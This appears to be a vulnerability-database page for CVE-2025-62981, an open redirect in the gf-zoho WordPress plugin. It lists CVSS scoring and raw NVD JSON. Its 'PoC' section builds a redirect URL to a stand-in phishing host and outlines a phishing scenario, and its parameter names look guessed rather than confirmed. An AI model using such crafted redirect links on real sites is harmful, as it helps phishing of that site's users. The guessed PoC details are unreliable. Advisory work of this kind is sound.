Security Vulnerability Report
中文
CVE-2025-62981 CVSS 4.7 MEDIUM

CVE-2025-62981

Published: 2025-10-27 02:15:59
Last Modified: 2026-04-27 17:16:40

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Phishing.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through <= 1.2.8.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Gravity Forms Zoho CRM and Bigin (gf-zoho) <= 1.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62981 Open Redirect PoC # Affected Plugin: WP Gravity Forms Zoho CRM and Bigin (gf-zoho) # Version: <= 1.2.8 # Malicious URL construction # The attacker crafts a URL that includes a redirect parameter pointing to a malicious site malicious_url = "https://vulnerable-site.com/wp-admin/admin.php?gf-zoho-action=redirect&redirect_url=https://evil-phishing-site.com" # Example attack scenario: # 1. Attacker creates a phishing page at evil-phishing-site.com # 2. Attacker distributes the malicious URL via email or other channels # 3. User clicks the link thinking it's legitimate # 4. User is redirected from the trusted site to the attacker's phishing site # 5. Phishing site collects sensitive user information print("Malicious URL:", malicious_url) print("User will be redirected to the attacker's controlled domain")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62981", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:58.940", "lastModified": "2026-04-27T17:16:39.667", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Phishing.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through <= 1.2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-zoho/vulnerability/wordpress-wp-gravity-forms-zoho-crm-and-bigin-plugin-1-2-8-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}